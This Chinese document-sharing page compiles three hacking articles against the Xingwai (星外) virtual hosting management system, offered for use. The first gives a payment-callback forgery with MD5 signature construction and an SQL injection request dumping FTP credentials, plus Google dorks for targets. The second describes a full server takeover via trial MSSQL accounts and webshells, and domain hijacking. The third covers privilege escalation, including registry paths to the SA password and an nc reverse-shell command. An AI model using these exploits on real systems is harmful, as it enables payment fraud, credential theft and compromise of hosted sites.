星外模板

时间：2025-04-04 03:37:25 作者：chepangewi90 综合材料收藏本文下载本文

【导语】“chepangewi90”通过精心收集，向本站投稿了3篇星外模板，下面是小编为大家整理后的星外模板，欢迎阅读与收藏。

目录
第1篇：星外虚拟主机管理系统刷钱漏洞+注射漏洞漏洞预警第2篇：星外虚拟主机0day利用介绍及过程网站安全第3篇：谈对星外主机提权利用网站安全

篇1：星外虚拟主机管理系统刷钱漏洞+注射漏洞漏洞预警

测试站：www.***.com/

注册账号，例如：test

访问：www.***.com/netpay/ips/

输入你用户名以及充值金额，

例如： test 10元

点下一步，会给你生成一个订单号。比如722978

记住它

参数构造：

billno=订单号&amount=充值金额&date=日期&succ=Y&signature=md5值

复制代码

日期 = 当前日期

充值金额 = 订单号上的金额

加入实际值：

billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

md5值=md5(billno&amount&date&succ)

这里演示的实际md5值为：

md5(722978520100613Y)=990a56c327f4b60d0c4d94a880f728ec

提交url

www.xx.com/netpay/ips/receive.asp?billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

这样5块钱就来了，

给你们一个关键字：inurl: (netpay/alipay)

注射漏洞

POST /netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21 HTTP/1.1

Cookie: billno=1'%20or%200%3c%3e(select%20top%201%20ftpname%2bchar(124)%2bftppassword%2bchar(124)%2bhostname%20from%20FreeHost.FreeHost_Product_Host%20where%20id%20not%20in(select%20top%200%20id%20from%20FreeHost.FreeHost_Product_Host%20order%20by%20id)%20order%20by%20id)%3b--

Content-Type: application/x-www-form-urlencoded

Referer:www.9c2c.com/netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21

Host:www.9c2c.com

Content-Length: 7

Expect: 100-continue

Connection: Keep-Alive

篇2：星外虚拟主机0day利用介绍及过程网站安全

一般星外虚拟主机都有试用功能，。随便注册一个号~点一下MSSQL试用三天或者一天~。。就会得到期MSSQL账号密码和管理IP。。设置远程访问IP连接上去用SQL注入工具V2.0增强版直接列出所有目录。。访问任意系统盘。。星外虚拟主机主站目录一盘在D盘的d:\\freehostmain里~而此目录里有一个ASAX文件里面是保存着存在SA同等权等的MSSQL账号~我们直接用注册的MSSQL执行LOG备份代码把一句话备到星外主站目录~直接连接一句话读取ASAX文件~得到密码再连接恢复CMD扩展。。执行CMD 开3389

就这样简单整个虚拟主机所有网站和服务器沦陷。。号外：我们日一些站时候查醒他们的注册域名商是多少~如果是星外或者华众并具有试用功能~我们就可以用上面方法日进去。。直接改他域名信息~劫持域名。。。

不过有一些限制是~有些空间商MSSQL权限设置超BT。。。上面方法无用。。不过知道网站路径一样可以备份。。记着~他默认路径是d:\\freehostmain

这也就是所说的旁不下的站。自己在空间服务商开个空间呵呵!

GOOGLE

用户管理中心 inurl:user/register2.asp

inurl:user/register2.asp

库站分离：还一问题就是很大型的主机站会把主站和空间站不是放在同一服务品上，

。。不过这方法也可以早日下所有站。。只是不能提到空间商主站的权限.

星外虚拟主机0day利用

一般星外虚拟主机都有试用功能。。随便注册一个号~点一下MSSQL试用三天或者一天~。。就会得到期MSSQL账号密码和管理IP。。设置远程访问IP连接上去用SQL注入工具V2.0增强版直接列出所有目录。。访问任意系统盘。。星外虚拟主机主站目录一盘在D盘的d:\\freehostmain里~而此目录里有一个ASAX文件里面是保存着存在SA同等权等的MSSQL账号~我们直接用注册的MSSQL执行LOG备份代码把一句话备到星外主站目录~直接连接一句话读取ASAX文件~得到密码再连接恢复CMD扩展。。执行CMD 开3389

不过有一些限制是~有些空间商MSSQL权限设置超BT。。。上面方法无用。。不过知道网站路径一样可以备份。。记着~他默认路径是d:\\freehostmain

这也就是所说的旁不下的站。自己在空间服务商开个空间呵呵!

GOOGLE

用户管理中心 inurl:user/register2.asp

inurl:user/register2.asp

库站分离：还一问题就是很大型的主机站会把主站和空间站不是放在同一服务品上。。。不过这方法也可以早日下所有站。。只是不能提到空间商主站的权限

篇3：谈对星外主机提权利用网站安全

T00LS上最近段时间谈了比较多星外提权的方法，最近刚好碰到了站结合些大牛的思路写个过程！目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本！上传了个BIN免杀ASPX大马其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限！RegShell读注册表没发现多少利用的东西，但是根据些信息知道是星外

对新手来说在这里很容易陷入困境！

星外sa密码注册表位置：HKEY_LOCAL_MACHINE\\SYSTEM\\LIWEIWENSOFT\\INSTALLFREEADMIN\\11 32位MD5加密很多情况下MD5跑不出有高人找到了个可写可执行目录C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\ cmd.exe上传在这里可以执行些简单的命令如: set,systeminfo,ipconfig,ping,等~利用这些命令可以收到比较多的系统信息.

如果你比较幸运管理配置不当的话还可以DIR C.D.E等其他盘，很久以前小K(khjl1)给我发了个for命令利用，for命令比dir执行权限要小类似dir的功能大家可以在不能dir的情况下试下

for /r d:\\freehost\\ %i in (test) do @echo %i >>C:\\路径\\1.txt 把d:\\freehost\\所有文件写入1.txt在用VBS读IIS密码时候很多提到NC反弹,其实不需要很多情况下NC根本反弹不了,防火墙都挡住了.成功率很底，如果你失败了而非得继续NC的话可以试下这个兄弟的,大家或许可以根据这个方法测试下。反弹cmdshell：

“c:\\windows\\temp\\nc.exe -vv ip 999 -e c:\\windows\\temp\\cmd.exe”

通常都不会成功，

而直接在 cmd路径上输入 c:\\windows\\temp\\nc.exe

命令输入 -vv ip 999 -e c:\\windows\\temp\\cmd.exe

却能成功。。

******我是没成功,呵呵******

systeminfo看了下管理把补丁打得很齐全用VBS提权测试这里我们可以把iis.vbs上传到WEB跟目录下而不必传到Media Index目录但是提权工具必须传到Media Index才有权限执行切记~ C:\\Documents and Settings\\下有空格所以得用“”包含如:

CmdPath：

C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\cmd.exe

Argument:

/c “c:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\cscript.exe” d:\\freehost\\web\\1.vbs

不包含的话会提示失败，所以细节决定成败！